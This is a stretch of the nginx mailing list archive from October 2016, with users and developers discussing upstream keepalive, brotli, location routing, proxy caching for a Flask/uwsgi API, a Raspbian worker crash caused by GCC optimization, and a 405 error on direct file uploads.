From emailgrant at gmail.com Sat Oct 1 01:15:17 2016 From: emailgrant at gmail.com (Grant) Date: Fri, 30 Sep 2016 18:15:17 -0700 Subject: keepalive upstream Message-ID: I've been struggling with a very difficult to diagnose problem when using apache2 and Odoo in a reverse proxy configuration with nginx. Enabling keepalive for upstream in nginx seems to have fixed it. Why is it not enabled upstream by default as it is downstream? - Grant From nginx-forum at forum.nginx.org Sat Oct 1 23:08:44 2016 From: nginx-forum at forum.nginx.org (spacerobot) Date: Sat, 01 Oct 2016 19:08:44 -0400 Subject: Parse response body and return status code/body based on it Message-ID: <3b878897f142802dbca2cc440c50a7a7.NginxMailingListEnglish@forum.nginx.org> Hi nginx experts, I'm trying to achieve an mechanism that for requests to certain endpoints, nginx makes a HTTP call to a certain server (mostly POST and DELETE), gets a response back, parse the response code and body, and based on the response code and the content of the response body, return certain HTTP status codes/response to the caller. Is there an existing module that can help achieve this? Thanks in advance! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270012,270012#msg-270012 From francis at daoine.org Sun Oct 2 10:07:09 2016 From: francis at daoine.org (Francis Daly) Date: Sun, 2 Oct 2016 11:07:09 +0100 Subject: location query string? In-Reply-To: References: <20160929213233.GE11677@daoine.org> Message-ID: <20161002100709.GH11677@daoine.org> On Fri, Sep 30, 2016 at 04:27:49AM -0700, Grant wrote: Hi there, > > I'm not quite sure what the specific problem you are seeing is, from > > the previous mails. > > Might the problem be related to your upstream not cleanly > > closing the connections? > > It sure could be. Would this be a good way to monitor that possibility: > > netstat -ant | awk '{print $6}' | sort | uniq -c | sort -n That could indicate when the number of tcp connections in various states changes; it may be a good starting point to find what the cause of the problem is. nginx makes a http request of upstream; it expects a http response. If the tcp connection and the http connection is staying open longer than necessary, that suggests that either the client (nginx) or the server (upstream) is doing something wrong. Can you make the same request manually of upstream, and see if there is any indication of things not being as they should? Is there any difference between a http/1.0 and a http/1.1 request to upstream? Or if the response includes a Content-Length header or is chunked? Or any other things that are different between the "working" and "not-working" cases. Your later mail suggests that "Keepalive" is involved somehow. If you are still keen to investigate -- can you see that nginx does something wrong when Keepalive is or is not set? Or does upstream do something wrong when Keepalive is or is not set? (If there is an nginx problem, I suspect that people will be interested in fixing it. If there is an upstream problem, then possibly people there will be interested in fixing it, or possibly a workaround can be provided on the nginx side.) Cheers, f -- Francis Daly francis at daoine.org From francis at daoine.org Sun Oct 2 10:18:03 2016 From: francis at daoine.org (Francis Daly) Date: Sun, 2 Oct 2016 11:18:03 +0100 Subject: Parse response body and return status code/body based on it In-Reply-To: <3b878897f142802dbca2cc440c50a7a7.NginxMailingListEnglish@forum.nginx.org> References: <3b878897f142802dbca2cc440c50a7a7.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161002101803.GI11677@daoine.org> On Sat, Oct 01, 2016 at 07:08:44PM -0400, spacerobot wrote: Hi there, > I'm trying to achieve an mechanism that for requests to certain endpoints, > nginx makes a HTTP call to a certain server (mostly POST and DELETE), gets a > response back, parse the response code and body, and based on the response > code and the content of the response body, return certain HTTP status > codes/response to the caller. Is there an existing module that can help > achieve this? That sounds like you want a very specific set of things to happen. It is unlikely that that exact set of things is already in a dedicated module. I suspect that you will find it easiest to start by using one of the embedded-language modules and writing your logic in that language -- lua, perl, and a version of javascript are available; probably more are too. (If there are specific things that you need, such as issuing a http DELETE to another url, you will want to confirm that the facility to do that is available in the language that you choose to use.) Good luck with it, f -- Francis Daly francis at daoine.org From zxcvbn4038 at gmail.com Mon Oct 3 03:16:09 2016 From: zxcvbn4038 at gmail.com (CJ Ess) Date: Sun, 2 Oct 2016 23:16:09 -0400 Subject: ngx_brotli In-Reply-To: References: Message-ID: The clients will send an "Accept-Encoding" header which includes "br" as one of the accepted types, that will trigger the module if its configured. It has a set of directives similar to the gzip module, so you'll need to set those. I think I see brotli support most from Chrome on Android. On Thu, Sep 29, 2016 at 11:22 PM, Dewangga Bachrul Alam < dewanggaba at xtremenitro.org> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA256 > > Hello! > > Is there any best practice or some example to see how brotli > compression works? I've patch the nginx using ngx_brotli[1], but I > didn't see any brotli header, there's only gzip. > > Many thanks. > > [1] https://github.com/cloudflare/ngx_brotli_module > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v2 > > iQI4BAEBCAAiBQJX7dqOGxxkZXdhbmdnYWJhQHh0cmVtZW5pdHJvLm9yZwAKCRDl > f9IgoCjNcGSVD/41lF7vqx79KwIuWoaqUYZbGZ/XVByUHWdSnjHM/Ysd0mMU+Gyj > uwmGfg4VifA56KO6hDBvptjmZ72Tg2NAz+6Sh7zQzFVuFHiv6gdM7/4nar7qNX8M > BO1s7LHJsIybQUMwXHVa2tX/AUoaUsGCBgHidkeQU5Y2d0xFPKwNnET6un8vDu1/ > 5wF/iV7rXChXs4rATzwpbEM4ujbIU/FmWJDriOxHMSDTBkyCm2VYVENUYekbA6nq > 15zjVULwQwC/eBrr4wOJoQ8h4wCNVoA7OyZ4gzkmvyMEyOWXt3BUqb2bYKPosZSm > HsihxD0Vls/P0fXhAjf5+wSeBcpbU1636Ci4UT6wiieCdvu5Z9EI1MJTQSsZ9RFW > GgxVg83Qcuq+H7HzF45/ksf0DNArd+X3/y5UvJTwBB7tcngmu+6fR9cpElsafNyA > FiYvYKeERT4lRRKZ5CAQYVHChIZBEt3iW+HbWDll3Wsa80Q4aYyZk9eeCbmsA/pd > Nzw+xrYaKetw8iDu3onxGwZ+oELFPHCYia/ulsXGC1GoAEwv12TloucPhiUFa3Pv > KsbQo1WQC0xyzZMQK/I3BASdPFyDozF8zMpHYa/+bidBMEUV4hVio6r/B23lQhcp > bf1r3u1bAvGKuSTB/jiIXwFWy1f1++Gg+pweFBUQppZ+dSuBmzS5TPg0Kg== > =DR41 > -----END PGP SIGNATURE----- > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From bhadauria.nitin at gmail.com Mon Oct 3 09:13:16 2016 From: bhadauria.nitin at gmail.com (nitin bhadauria) Date: Mon, 3 Oct 2016 14:43:16 +0530 Subject: Rate limit per day Message-ID: Hello Team, Is it possible to use Module ngx_http_limit_req_module to rate limit request / day ? Regards, Nitin B. -------------- next part -------------- An HTML attachment was scrubbed... URL: From tseveendorj at gmail.com Mon Oct 3 10:28:19 2016 From: tseveendorj at gmail.com (Tseveendorj Ochirlantuu) Date: Mon, 3 Oct 2016 18:28:19 +0800 Subject: specific to index.php rest of them index.html Message-ID: Hello, I need to configure some locations go to index.php rest go to index.html if ($request_uri !~ ^/(location1|location2|location3)$ ) { rewrite ^(.*) /index.html; } but how to else ? if the request contains location1, location2, location3 goes to fastcgi_pass 127.0.0.1:9000; if not contain go to /index.html regards, tseveen -------------- next part -------------- An HTML attachment was scrubbed... URL: From r1ch+nginx at teamliquid.net Mon Oct 3 12:40:19 2016 From: r1ch+nginx at teamliquid.net (Richard Stanway) Date: Mon, 3 Oct 2016 14:40:19 +0200 Subject: specific to index.php rest of them index.html In-Reply-To: References: Message-ID: Why not use the location directive? This is what it is designed for. http://nginx.org/en/docs/http/ngx_http_core_module.html#location On Mon, Oct 3, 2016 at 12:28 PM, Tseveendorj Ochirlantuu < tseveendorj at gmail.com> wrote: > Hello, > > I need to configure some locations go to index.php rest go to index.html > > > if ($request_uri !~ ^/(location1|location2|location3)$ ) { > rewrite ^(.*) /index.html; > } > > but how to else ? > > if the request contains location1, location2, location3 goes to > fastcgi_pass 127.0.0.1:9000; > if not contain go to /index.html > > regards, > tseveen > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From tseveendorj at gmail.com Mon Oct 3 13:53:06 2016 From: tseveendorj at gmail.com (Tseveendorj Ochirlantuu) Date: Mon, 3 Oct 2016 21:53:06 +0800 Subject: specific to index.php rest of them index.html In-Reply-To: References: Message-ID: This is for symfony2 project. location ~ /location1 { fastcgi things; } location ~ /location2 { fastcgi things; } location ~ /location3 { fastcgi things; } location / { index index.html; } Above examples how fit to symfony2 below. Mine is # dev location ~ ^(app_dev|config)\.php$ { fastcgi things; } # prod location ~ ^app.php { fastcgi things; } location ~ \.php { deny all; } location / { try_files; } On Mon, Oct 3, 2016 at 8:40 PM, Richard Stanway wrote: > Why not use the location directive? This is what it is designed for. > > http://nginx.org/en/docs/http/ngx_http_core_module.html#location > > > On Mon, Oct 3, 2016 at 12:28 PM, Tseveendorj Ochirlantuu < > tseveendorj at gmail.com> wrote: > >> Hello, >> >> I need to configure some locations go to index.php rest go to index.html >> >> >> if ($request_uri !~ ^/(location1|location2|location3)$ ) { >> rewrite ^(.*) /index.html; >> } >> >> but how to else ? >> >> if the request contains location1, location2, location3 goes to >> fastcgi_pass 127.0.0.1:9000; >> if not contain go to /index.html >> >> regards, >> tseveen >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From pcgeopc at gmail.com Mon Oct 3 13:58:04 2016 From: pcgeopc at gmail.com (Geo P.C.) Date: Mon, 3 Oct 2016 19:28:04 +0530 Subject: URL is not pointing to https on iframe Message-ID: In our site we are loading a calnedar api function that works on http ( cdn.instantcal.com) . While loading this site on our wordpress site with https its not working and getting an error: "Mixed Content: The page at ' https://www.geo.com/wp-admin/post.php?post=362&action=edit' was loaded over HTTPS, but requested an insecure resource ' http://cdn.instantcal.com/cvj.html'. This request has been blocked; the content must be served over HTTPS." In order to fix the Mixed Iframe Issue in our Nginx Proxy server we configured a new site on https calendar.geopc.com and that proxies to cdn.instantcal.com. server { listen 443; server_name calendar.geopc.com; location / { proxy_pass http://cdn.instantcal.com; proxy_set_header Host cdn.instantcal.com; proxy_set_header X-Real-IP $remote_addr; } } Then In Iframe we given the url as But in Iframe we are getting the same error Mixed Content: The page at ' https://www.geo.com/wp-admin/post.php?post=362&action=edit' was loaded over HTTPS, but requested an insecure resource ' http://calendar.geopc.com/cvj.html?idcloseable=0&gnavigable=1&gperiod=da'. This request has been blocked; the content must be served over HTTPS. When we directly access the url calendar.geopc.com on https its working fine on https. But please let me know whats the issue? Is it on Iframe or on Nginx. Can anyone please help us? -------------- next part -------------- An HTML attachment was scrubbed... URL: From medvedev.yp at gmail.com Mon Oct 3 14:02:54 2016 From: medvedev.yp at gmail.com (Yuriy Medvedev) Date: Mon, 3 Oct 2016 17:02:54 +0300 Subject: URL is not pointing to https on iframe In-Reply-To: References: Message-ID: Hi, please use $scheme proxy_set_header X-Forwarded-Proto $scheme; 2016-10-03 16:58 GMT+03:00 Geo P.C. : > In our site we are loading a calnedar api function that works on http ( > cdn.instantcal.com) . While loading this site on our wordpress site with > https its not working and getting an error: > > "Mixed Content: The page at 'https://www.geo.com/wp-admin/ > post.php?post=362&action=edit' was loaded over HTTPS, but requested an > insecure resource 'http://cdn.instantcal.com/cvj.html'. This request has > been blocked; the content must be served over HTTPS." > > In order to fix the Mixed Iframe Issue in our Nginx Proxy server we > configured a new site on https calendar.geopc.com and that proxies to > cdn.instantcal.com. > > server { > listen 443; > server_name calendar.geopc.com; > location / { > proxy_pass http://cdn.instantcal.com; > proxy_set_header Host cdn.instantcal.com; > proxy_set_header X-Real-IP $remote_addr; > } > } > > Then In Iframe we given the url as > > But in Iframe we are getting the same error > > Mixed Content: The page at 'https://www.geo.com/wp-admin/ > post.php?post=362&action=edit' was loaded over HTTPS, but requested an > insecure resource 'http://calendar.geopc.com/cvj.html?idcloseable=0& > gnavigable=1&gperiod=da'. This request has been blocked; the content must > be served over HTTPS. > > When we directly access the url calendar.geopc.com on https its working > fine on https. But please let me know whats the issue? Is it on Iframe or > on Nginx. Can anyone please help us? > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Mon Oct 3 15:04:39 2016 From: nginx-forum at forum.nginx.org (smaig) Date: Mon, 03 Oct 2016 11:04:39 -0400 Subject: nginx worker process exited on signal 7 Message-ID: <16953dca81ce317c3c3dcd98cf0cb4a8.NginxMailingListEnglish@forum.nginx.org> Hello team, i've followed this tutorial(https://www.c-rieger.de/nextcloud-installation-guide/) to configure nginx for nextcloud on a raspberry pi 3 but using Raspbian OS instead of Ubuntu. I guess the only specific thing in this installation is that we used "ngx_cache_purge-2.3" args to compile nginx 1.11.4: ... COMMON_CONFIGURE_ARGS := \ ... --with-ld-opt="$(LDFLAGS)" \ --add-module="$(CURDIR)/debian/modules/ngx_cache_purge-2.3" In one case, everything is working using those configuration files : nginx.conf : http://pastebin.com/KnpAFm3h nextcloud.conf.https : http://pastebin.com/ZzDy9puJ nginx/error.log (debug level): 2016/10/01 11:12:15 [notice] 14944#14944: built by gcc 4.9.2 (Raspbian 4.9.2-10) 2016/10/01 11:12:15 [notice] 14944#14944: OS: Linux 4.4.21-v7+ 2016/10/01 11:12:15 [notice] 14944#14944: getrlimit(RLIMIT_NOFILE): 1024:4096 2016/10/01 11:12:15 [notice] 14945#14945: start worker processes 2016/10/01 11:12:15 [notice] 14945#14945: start worker process 14946 2016/10/01 11:12:15 [notice] 14945#14945: start worker process 14947 2016/10/01 11:12:15 [notice] 14945#14945: start worker process 14948 2016/10/01 11:12:15 [notice] 14945#14945: start worker process 14949 2016/10/01 11:12:15 [notice] 14945#14945: start cache manager process 14950 2016/10/01 11:12:15 [notice] 14945#14945: start cache loader process 14951 2016/10/01 11:12:28 [notice] 14949#14949: *1 "^" matches "/", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:12:28 [notice] 14949#14949: *1 rewritten data: "/index.php/", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:12:28 [notice] 14949#14949: *1 "^" matches "/apps/files/", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET /apps/files/ HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:12:28 [notice] 14949#14949: *1 rewritten data: "/index.php/apps/files/", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET /apps/files/ HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:12:31 [notice] 14947#14947: *12 "^" matches "/apps/encryption/ajax/getStatus", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET /apps/encryption/ajax/getStatus HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:12:31 [notice] 14947#14947: *12 rewritten data: "/index.php/apps/encryption/ajax/getStatus", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET /apps/encryption/ajax/getStatus HTTP/1.1", host: "mycloud.dyndns.org" In another one, it's not working with those configuration files : nginx.conf : http://pastebin.com/Yyuk7ki2 gateway.conf : http://pastebin.com/P4Kzdt41 nextcloud.conf : http://pastebin.com/6ySjAHGB nginx/error.log: 2016/10/01 11:13:38 [notice] 14975#14975: built by gcc 4.9.2 (Raspbian 4.9.2-10) 2016/10/01 11:13:38 [notice] 14975#14975: OS: Linux 4.4.21-v7+ 2016/10/01 11:13:38 [notice] 14975#14975: getrlimit(RLIMIT_NOFILE): 1024:4096 2016/10/01 11:13:38 [notice] 14976#14976: start worker processes 2016/10/01 11:13:38 [notice] 14976#14976: start worker process 14977 2016/10/01 11:13:38 [notice] 14976#14976: start worker process 14978 2016/10/01 11:13:38 [notice] 14976#14976: start worker process 14979 2016/10/01 11:13:38 [notice] 14976#14976: start worker process 14980 2016/10/01 11:13:38 [notice] 14976#14976: start cache manager process 14981 2016/10/01 11:13:38 [notice] 14976#14976: start cache loader process 14982 2016/10/01 11:13:48 [notice] 14977#14977: *1 "^" matches "/", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14977#14977: *1 rewritten data: "/nextcloud", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14978#14978: *5 "^" matches "/nextcloud", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14978#14978: *5 rewritten data: "/nextcloud/index.php/nextcloud", args: "", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [info] 14978#14978: *5 client 127.0.0.1 closed keepalive connection 2016/10/01 11:13:48 [notice] 14976#14976: signal 17 (SIGCHLD) received 2016/10/01 11:13:48 [alert] 14976#14976: worker process 14977 exited on signal 7 2016/10/01 11:13:48 [notice] 14976#14976: start worker process 14984 2016/10/01 11:13:48 [notice] 14976#14976: signal 29 (SIGIO) received 2016/10/01 11:13:48 [notice] 14980#14980: *7 "^" matches "/", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14980#14980: *7 rewritten data: "/nextcloud", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14978#14978: *11 "^" matches "/nextcloud", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [notice] 14978#14978: *11 rewritten data: "/nextcloud/index.php/nextcloud", args: "", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:48 [info] 14978#14978: *11 client 127.0.0.1 closed keepalive connection 2016/10/01 11:13:48 [notice] 14976#14976: signal 17 (SIGCHLD) received 2016/10/01 11:13:48 [alert] 14976#14976: worker process 14980 exited on signal 7 2016/10/01 11:13:48 [notice] 14976#14976: start worker process 14985 2016/10/01 11:13:48 [notice] 14976#14976: signal 29 (SIGIO) received 2016/10/01 11:13:54 [notice] 14978#14978: *13 "^" matches "/", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:54 [notice] 14978#14978: *13 rewritten data: "/nextcloud", args: "", client: 1.2.3.4, server: mycloud.dyndns.org, request: "GET / HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:54 [notice] 14984#14984: *17 "^" matches "/nextcloud", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:54 [notice] 14984#14984: *17 rewritten data: "/nextcloud/index.php/nextcloud", args: "", client: 127.0.0.1, server: 127.0.0.1, request: "GET /nextcloud HTTP/1.1", host: "mycloud.dyndns.org" 2016/10/01 11:13:54 [info] 14984#14984: *17 client 127.0.0.1 closed keepalive connection 2016/10/01 11:13:54 [notice] 14976#14976: signal 17 (SIGCHLD) received 2016/10/01 11:13:54 [alert] 14976#14976: worker process 14978 exited on signal 7 2016/10/01 11:13:54 [notice] 14976#14976: start worker process 14986 2016/10/01 11:13:54 [notice] 14976#14976: signal 29 (SIGIO) received The author of the installation guide i've followed tried to help me on nextcloud forum and used my configuration file on his own ubuntu server without any issue... So, question is, why it's not working on my raspbian os with exactly the same config file ? (except domain) Regards, Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270043,270043#msg-270043 From mdounin at mdounin.ru Mon Oct 3 15:13:13 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 3 Oct 2016 18:13:13 +0300 Subject: nginx worker process exited on signal 7 In-Reply-To: <16953dca81ce317c3c3dcd98cf0cb4a8.NginxMailingListEnglish@forum.nginx.org> References: <16953dca81ce317c3c3dcd98cf0cb4a8.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161003151313.GE73038@mdounin.ru> Hello! On Mon, Oct 03, 2016 at 11:04:39AM -0400, smaig wrote: > i've followed this > tutorial(https://www.c-rieger.de/nextcloud-installation-guide/) to configure > nginx for nextcloud on a raspberry pi 3 but using Raspbian OS instead of > Ubuntu. > > I guess the only specific thing in this installation is that we used > "ngx_cache_purge-2.3" args to compile nginx 1.11.4: > > ... > COMMON_CONFIGURE_ARGS := \ > ... > --with-ld-opt="$(LDFLAGS)" \ > --add-module="$(CURDIR)/debian/modules/ngx_cache_purge-2.3" > > In one case, everything is working using those configuration files : > > nginx.conf : http://pastebin.com/KnpAFm3h > nextcloud.conf.https : http://pastebin.com/ZzDy9puJ > > nginx/error.log (debug level): > > 2016/10/01 11:12:15 [notice] 14944#14944: built by gcc 4.9.2 (Raspbian > 4.9.2-10) > 2016/10/01 11:12:15 [notice] 14944#14944: OS: Linux 4.4.21-v7+ Start with checking your optimization flags. GCC as shipped in Raspbian (Raspbian 4.9.2-10) is known to produce broken code at the -O2 optimization level, see details here: https://trac.nginx.org/nginx/ticket/912 [...] -- Maxim Dounin http://nginx.org/ From itsawesome.yes at gmail.com Tue Oct 4 15:17:38 2016 From: itsawesome.yes at gmail.com (Luigi Assom) Date: Tue, 4 Oct 2016 17:17:38 +0200 Subject: cache all endpoints but one: nginx settings Message-ID: Hello, I have a flask web app + uwsgi + nginx. I am using nginx both as server as well as proxy server. *How to make nginx to cache successful results from all API ending points but one?* I want to cache *only successful responses *from all /api/endpoints except /api/search. 1. I tried to: -- add a new location (see api/search) to the proxy server to *proxy_pass* the request to default server; -- put all other /api/ location blocks with cache settings *after * the* /api/search* location It seems not to cache as I want (It is caching everything). 2. I designed my webapps like this (see mockup in attachment): -- 1 api return a page; if page is not found, *it returns a json formatted warning* '{warning : not found'} -- 1 template handle 404 missing pages To say, while example.com/api/mockup will return a result (200 response) example/mockup will return a 404 response In case page is not found, will nginx cache the api result or not given my current settings? Could you clarify how flask, uwsgi and nginx server (port 8000) and nginx proxy server (port 80) are interacting in such a case, given my settings? ** Please see in attachment blocks from my nginx settings. Uwsgi settings are below. *** UWSGI # settings in myapp.ini *** [uwsgi] module = wsgi master = true processes = 5 socket = awesome3.sock chmod-socket = 660 vacuum = true die-on-term = true logto = /var/log/uwsgi/%n.log protocol = uwsgi harakiri = 120 *** Thank you so much for helping out! -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- server { listen 8000 default_server; server_name example.com; charset utf-8; root /var/www/example; location / { include uwsgi_params; uwsgi_pass unix:/var/www/awesome3-gamma/awesome3.sock; } # Set Cache for my Json api # I DO NOT WANT TO CACHE /api/search !!!! # I let expires 1M for json responses, and try with proxy_pass # as https://groups.google.com/forum/embed/#!topic/openresty-en/apyaHbqJetU location ~* \.(?:json)$ { expires 1M; access_log off; add_header Cache-Control "public"; } location /api { include uwsgi_params; uwsgi_pass unix:/var/www/awesome3-gamma/awesome3.sock; allow XX.XX.XXX.XXX:; deny all; } } # Set cache dir for nginx proxy_cache_path /tmp/nginx levels=1:2 keys_zone=my_zone:10m inactive=60m; proxy_cache_key "$scheme$request_method$host$request_uri"; # Attempt to delete single file cache - skip it # http://serverfault.com/questions/493411/how-to-delete-single-nginx-cache-file # curl -s -o /dev/null -H "X-Update: 1" mydomain.com # proxy_cache_bypass $http_x_update; # Here I set a proxy server: # I try to proxy_pass /api/search # with no cache settings # Virtualhost/server configuration server { listen 80 default_server; server_name example.com; root /var/www/example; charset utf-8; location /api/search { proxy_pass http://example:8000/api/search; } # can cache my API won't change location /api { add_header X-Proxy-Cache $upstream_cache_status; proxy_cache my_zone; proxy_cache_use_stale updating; proxy_cache_lock on; # proxy_cache_valid any 30s; proxy_cache_valid 30d; proxy_ignore_headers X-Accel-Expires Expires Cache-Control; proxy_pass http://example.com:8000/api; } } # like this, in my browser I still see all api request as # add_header Cache-Control "no-cache, must-revalidate, max-age=0"; -------------- next part -------------- A non-text attachment was scrubbed... Name: myapp.py Type: text/x-python-script Size: 1034 bytes Desc: not available URL: From mdounin at mdounin.ru Tue Oct 4 16:28:25 2016 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 4 Oct 2016 19:28:25 +0300 Subject: cache all endpoints but one: nginx settings In-Reply-To: References: Message-ID: <20161004162825.GM73038@mdounin.ru> Hello! On Tue, Oct 04, 2016 at 05:17:38PM +0200, Luigi Assom wrote: > I have a flask web app + uwsgi + nginx. > I am using nginx both as server as well as proxy server. > > *How to make nginx to cache successful results from all API ending points > but one?* > > I want to cache *only successful responses *from all /api/endpoints except > /api/search. Try this: location /api/ { ... cache switched on here ... } location /api/search { ... cache off here ... } Alternatively, you can control response cacheability by returning appropriate headers (Cache-Control, Expires, X-Accel-Expires) from your backend. But given... > 1. I tried to: > -- add a new location (see api/search) to the proxy server to *proxy_pass* the > request to default server; > -- put all other /api/ location blocks with cache settings *after * the* > /api/search* location > > It seems not to cache as I want (It is caching everything). ... it looks like your problem is elsewhere. That is, you either failed to apply configuration changes, or you are testing it wrong. Some tips: - Make sure you've reloaded nginx configuration after changes, and reload was successful (that is: check error log). If unsure, stop nginx, make sure it is no longer responding, start it again. - Make sure to test with command-line tools like curl. Browsers have their own caches and it's very easy to confuse things even if you are an experienced web developer. > 2. I designed my webapps like this (see mockup in attachment): > -- 1 api return a page; if page is not found, *it returns a json formatted > warning* > '{warning : not found'} > -- 1 template handle 404 missing pages > > To say, while > example.com/api/mockup will return a result (200 response) > example/mockup will return a 404 response > > In case page is not found, will nginx cache the api result or not given my > current settings? > > Could you clarify how flask, uwsgi and nginx server (port 8000) and nginx > proxy server (port 80) are interacting in such a case, given my settings? >From your python code it looks like you return 200 on errors, at least in case of errors in mockup_template(). As far as I understand from http://flask.pocoo.org/docs/0.11/errorhandling/#error-handlers, you should use abort(404) to return proper 404 error to nginx. With 200 returned in all cases it will not be non-trivial to do anything on nginx side if you want to cache some 200 responses, but not others. Once you'll change your code to properly return 404 it selectively control what to cache using the proxy_cache_valid directive, see http://nginx.org/r/proxy_cache_valid. -- Maxim Dounin http://nginx.org/ From emailgrant at gmail.com Tue Oct 4 17:12:07 2016 From: emailgrant at gmail.com (Grant) Date: Tue, 4 Oct 2016 10:12:07 -0700 Subject: location query string? In-Reply-To: <20161002100709.GH11677@daoine.org> References: <20160929213233.GE11677@daoine.org> <20161002100709.GH11677@daoine.org> Message-ID: >> > I'm not quite sure what the specific problem you are seeing is, from >> > the previous mails. > >> > Might the problem be related to your upstream not cleanly >> > closing the connections? >> >> It sure could be. Would this be a good way to monitor that possibility: >> >> netstat -ant | awk '{print $6}' | sort | uniq -c | sort -n > > That could indicate when the number of tcp connections in various states > changes; it may be a good starting point to find what the cause of the > problem is. > > nginx makes a http request of upstream; it expects a http response. If > the tcp connection and the http connection is staying open longer than > necessary, that suggests that either the client (nginx) or the server > (upstream) is doing something wrong. > > Can you make the same request manually of upstream, and see if there is > any indication of things not being as they should? > > Is there any difference between a http/1.0 and a http/1.1 request to > upstream? Or if the response includes a Content-Length header or is > chunked? Or any other things that are different between the "working" > and "not-working" cases. > > Your later mail suggests that "Keepalive" is involved somehow. If you > are still keen to investigate -- can you see that nginx does something > wrong when Keepalive is or is not set? Or does upstream do something > wrong when Keepalive is or is not set? (If there is an nginx problem, > I suspect that people will be interested in fixing it. If there is an > upstream problem, then possibly people there will be interested in fixing > it, or possibly a workaround can be provided on the nginx side.) Admittedly this is over my head. I would be happy to test and probe if anyone is interested enough to tell me what to do. - Grant From nginx-forum at forum.nginx.org Tue Oct 4 19:28:18 2016 From: nginx-forum at forum.nginx.org (yurai) Date: Tue, 04 Oct 2016 15:28:18 -0400 Subject: Clientbodyinfileonly - POST request is discarded Message-ID: <7598f715feca4d51b9a9d738bd221c68.NginxMailingListEnglish@forum.nginx.org> Hello Nginx community, I try to perform big file upload on my Nginx server basing on instructions from https://coderwall.com/p/swgfvw/nginx-direct-file-upload-without-passing-them-through-backend Unfortunately I get "HTTP/1.1 405 Not Allowed" error code all the time. 1. My minimal configuration: worker_processes 1; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; tcp_nopush on; tcp_nodelay on; types_hash_max_size 2048; keepalive_timeout 65; client_body_temp_path /tmp/nginx-client-body; server { listen 80; server_name s1; location /upload { #auth_basic "Restricted Upload"; #auth_basic_user_file basic.htpasswd; client_body_temp_path /tmp/; client_body_in_file_only on; client_body_buffer_size 128K; client_max_body_size 1000M; proxy_pass_request_headers on; proxy_set_header X-FILE $request_body_file; proxy_set_body off; proxy_redirect off; proxy_pass http://127.0.0.1:8080/upload.txt; } } server { listen 8080; server_name s2; location / { root /usr/share/nginx/html/foo/bar; autoindex on; } } } 2. GET works as expected: curl -i http://localhost/upload HTTP/1.1 200 OK Server: nginx/1.11.4 Date: Tue, 04 Oct 2016 19:05:42 GMT Content-Type: text/plain Content-Length: 4 Connection: keep-alive Last-Modified: Tue, 04 Oct 2016 18:44:59 GMT ETag: "57f3f8ab-4" Accept-Ranges: bytes abc It's OK - file upload.txt has "abc" content. 3. Unfortunately POST does not work: curl --data-binary upload.txt http://localhost/upload 405 Not Allowed

405 Not Allowed


nginx/1.11.4
